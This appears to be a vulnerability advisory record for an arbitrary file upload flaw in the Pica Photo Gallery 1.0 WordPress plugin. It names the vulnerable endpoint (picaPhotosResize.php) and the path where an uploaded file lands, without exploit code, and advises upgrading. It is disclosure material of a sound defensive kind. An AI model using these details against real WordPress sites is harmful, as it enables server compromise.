vendor: Pica Photo Gallery
by: Adrien Thierry
CVSS: 7.5 HIGH
Arbitrary File Upload
CWE: 434
Product Name: Pica Photo Gallery
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:apptha:pica_photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2012
WordPress Pica Photo Gallery 1.0 Arbitrary File Upload
An arbitrary file upload vulnerability exists in version 1.0 of the Pica Photo Gallery plugin for WordPress. An attacker can exploit it by sending a malicious file to the picaPhotosResize.php page in a POST request. The file is written to the server and can then be accessed at the URL wp-content/uploads/pica-photo-gallery/info.php.
Mitigation:
Upgrade to the latest version of the Pica Photo Gallery plugin.